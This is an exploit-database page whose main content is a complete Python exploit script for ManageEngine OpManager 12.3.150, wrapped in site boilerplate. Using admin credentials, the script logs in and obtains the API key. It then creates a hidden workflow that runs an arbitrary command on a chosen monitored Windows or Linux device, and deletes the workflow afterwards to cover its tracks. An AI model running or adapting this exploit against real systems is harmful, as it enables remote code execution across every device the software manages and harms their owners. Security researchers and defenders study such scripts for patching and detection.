0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

ManageEngine opManager 12.3.150 - Authenticated Code Execution Exploit

Author

kindredsec

Risk

[

Security Risk Critical

]

0day-ID

Category

Date add

Platform

#!/usr/bin/env python3

# Exploit Title: ManageEngine opManager Authenticated Code Execution
# Google Dork: N/A
# Date: 08/13/2019
# Exploit Author: @kindredsec
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/network-monitoring/download.html
# Version: 12.3.150
# Tested on: Windows Server 2016
# CVE: N/A

import requests
import re
import random
import sys
import json
import string
import argparse

C_WHITE = '\033[1;37m'
C_BLUE = '\033[1;34m'
C_GREEN = '\033[1;32m'
C_YELLOW = '\033[1;33m'
C_RED = '\033[1;31m'
C_RESET = '\033[0m'
LOGIN_FAIL_MSG = "Invalid username and/or password."

def buildRandomString(length=10):
	letters = string.ascii_lowercase
	return ''.join(random.choice(letters) for i in range(length))


def getSessionData(target, user, password):

	session = requests.Session()
	session.get(target)

	# Login Sequence
	randSid = random.uniform(-1,1)
	getParams = { "requestType" : "AJAX" , "sid" : str(randSid) }
	postData = { "eraseAutoLoginCookie" : "true" }
	session.post( url = target + "/servlets/SettingsServlet", data = postData, params = getParams )

	postData = { "loginFromCookieData" : "false",
						 "ntlmv2" : "false", 
						 "j_username" : user,
						 "j_password" : password 
						}
	initialAuth = session.post( url = target + "/j_security_check", data = postData ) 


	if LOGIN_FAIL_MSG in initialAuth.text:

		print(f"{C_RED}[-]{C_RESET} Invalid credentials specified! Could not login to OpManager.")
		sys.exit(1)

	elif initialAuth.status_code != 200:
		print(f"{C_RED}[-]{C_RESET} An Unknown Error has occurred during the authentication process.")
		sys.exit(1)

	apiKeyReg = re.search(".*\.apiKey = .*;", initialAuth.text)
	apiKey = apiKeyReg.group(0).split('"')[1]

	return { "session" : session , "apiKey" : apiKey }




def getDeviceList(target, session, apiKey):

	deviceList = session.get( target + "/api/json/v2/device/listDevices" , params = { "apiKey" : apiKey } )

	devices = {}
	devicesJsonParsed = json.loads(deviceList.text)
	for row in devicesJsonParsed["rows"]:
		devices[row["deviceName"]] = [ row["ipaddress"], row["type"] ]

	return devices



def buildTaskWindows(target, session, apiKey, device, command):

	# Build Task
	taskName = buildRandomString()
	workFlowName = buildRandomString(15)

	jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":"""
	jsonData += '"' + taskName + '"'
	jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"cmd.exe /c ${FileName}.bat ${DeviceName} ${UserName} ${Password} arg1","scriptBody":""" 
	jsonData += '"' + command + '"'
	jsonData +=  ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":"""
	jsonData += '"' + workFlowName + '"' 
	jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":["""
	jsonData += '"' +  device + '"' 
	jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee"""
	jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y"""
	jsonData += """earlyMin":"0"},"criteriaDetails":{}}}"""

	makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData })

	if "has been created successfully" in makeWorkFlow.text:
		print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow")
	else:
		print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .")
		sys.exit(1)

	return workFlowName


def buildTaskLinux(target, session, apiKey, device, command):

	taskName = buildRandomString()
	workFlowName = buildRandomString(15)

	jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":"""
	jsonData += '"' + taskName + '"'
	jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"sh ${FileName} ${DeviceName} arg1","scriptBody":""" 
	jsonData += '"' + command + '"'
	jsonData +=  ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":"""
	jsonData += '"' + workFlowName + '"' 
	jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":["""
	jsonData += '"' +  device + '"' 
	jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee"""
	jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y"""
	jsonData += """earlyMin":"0"},"criteriaDetails":{}}}"""

	makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData })

	if "has been created successfully" in makeWorkFlow.text:
		print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow")
	else:
		print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .")
		sys.exit(1)

	return workFlowName


# Get the ID of the newly created workflow
def getWorkflowID(target, session, apiKey, workflowName):

	getID = session.get(url = target + "/api/json/workflow/getWorkflowList", params = { "apiKey" : apiKey })

	rbID = -100
	workflowJsonParsed = json.loads(getID.text)
	for wf in workflowJsonParsed:
		if wf['name'] == workflowName:
			rbID = wf['rbID'] 

	if rbID == -100: 
		print(f"{C_RED}[-]{C_RESET} Issue obtaining Workflow ID. Exiting ...")
		sys.exit(1)

	return rbID


def getDeviceID(target, session, apiKey, rbID, device):

	getDevices = session.get(url = target + "/api/json/workflow/showDevicesForWorkflow", params = { "apiKey" : apiKey , "wfID" : rbID })
	wfDevicesJsonParsed = json.loads(getDevices.text)
	wfDevices = wfDevicesJsonParsed["defaultDevices"]
	deviceID = list(wfDevices.keys())[0]

	return deviceID



def runWorkflow(target, session, apiKey, rbID, device):

	targetDeviceID = getDeviceID(target, session, apiKey, rbID, device)
	
	print(f"{C_YELLOW}[!]{C_RESET} Executing Code . . .")
	workflowExec = session.post(target + "/api/json/workflow/executeWorkflow", params = { "apiKey" : apiKey }, data = { "wfID" : rbID, "deviceName" : targetDeviceID, "triggerType" : 0 }	)

	if re.match(r"^\[.*\]$", workflowExec.text.strip()):
		print(f"{C_GREEN}[+]{C_RESET} Code appears to have run successfully!")
	else:
		print(f"{C_RED}[-]{C_RESET} Unknown error has occurred. Please try again or run the process manually.")
		sys.exit(1)

	deleteWorkflow(target, session, apiKey, rbID)
	print(f"{C_GREEN}[+]{C_RESET} Exploit complete!")


def deleteWorkflow(target, session, apiKey, rbID):
	
	print(f"{C_YELLOW}[!]{C_RESET} Cleaning up . . .")
	delWorkFlow = session.post( target + "/api/json/workflow/deleteWorkflow" , params = { "apiKey" : apiKey, "wfID" : rbID })


def main():

	parser = argparse.ArgumentParser(description="Utilizes OpManager's Workflow feature to execute commands on any monitored device.")
	parser.add_argument("-t", nargs='?', metavar="target", help="The full base URL of the OpManager Instance (Example: http://192.168.1.1)")
	parser.add_argument("-u", nargs='?', metavar="user", help="The username of a valid OpManager admin account.")
	parser.add_argument("-p", nargs='?', metavar="password", help="The password of a valid OpManager admin account.")
	parser.add_argument("-c", nargs='?', metavar="command", help="The command you want to run.")

	args = parser.parse_args()
	
	insufficient_args = False
	if not args.u:
		print(f"{C_RED}[-]{C_RESET} Please specify a username with '-t'.")
		insufficient_args = True
	if not args.t:
		print(f"{C_RED}[-]{C_RESET} Please specify a target with '-t'.")
		insufficient_args = True
	if not args.p:
		print(f"{C_RED}[-]{C_RESET} Please specify a password with '-p'.")
		insufficient_args = True
	if not args.c:
		print(f"{C_RED}[-]{C_RESET} Please specify a command with '-c'.")
		insufficient_args = True

	if insufficient_args:
		sys.exit(1)

	
	sessionDat = getSessionData(args.t, args.u, args.p)
	session = sessionDat["session"]
	apiKey = sessionDat["apiKey"]

	devices = getDeviceList(args.t, session, apiKey)

	# if there's only one device in the OpManager instance, default to running commands on that device;
	# no need to ask the user.
	if len(devices.keys()) == 1:
		device = list(devices.keys())[0]
	else:
		print(f"{C_YELLOW}[!]{C_RESET} There appears to be multiple Devices within this target OpManager Instance:")
		print("")
		counter = 1
		for key in devices.keys():
			print(f"   {counter}: {key} ({devices[key][0]}) ({devices[key][1]})")

		print("")
		while True:
			try:
				prompt = f"{C_BLUE}[?]{C_RESET} Please specify which Device you want to run your command on: "
				devSelect = int(input(prompt))
			except KeyboardInterrupt:
				sys.exit(1)
			except ValueError:
				print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .")
				sys.exit(1)
	
			if devSelect < 1 or devSelect > len(list(devices.keys())):
				print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .")
				sys.exit(1)

			else:
				device = list(devices.keys())[counter - 1]
				break

	# don't hate, it works doesn't it?
	if "indows" in devices[device][1]:
		workflowName = buildTaskWindows(args.t, session, apiKey, device, args.c)
	else:
		workflowName = buildTaskLinux(args.t, session, apiKey, device, args.c)

	workflowID =  getWorkflowID(args.t, session, apiKey, workflowName)
	runWorkflow(args.t, session, apiKey, workflowID, device)
	
	
main()

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

ManageEngine opManager 12.3.150 - Authenticated Code Execution Exploit

Report Error

Report Error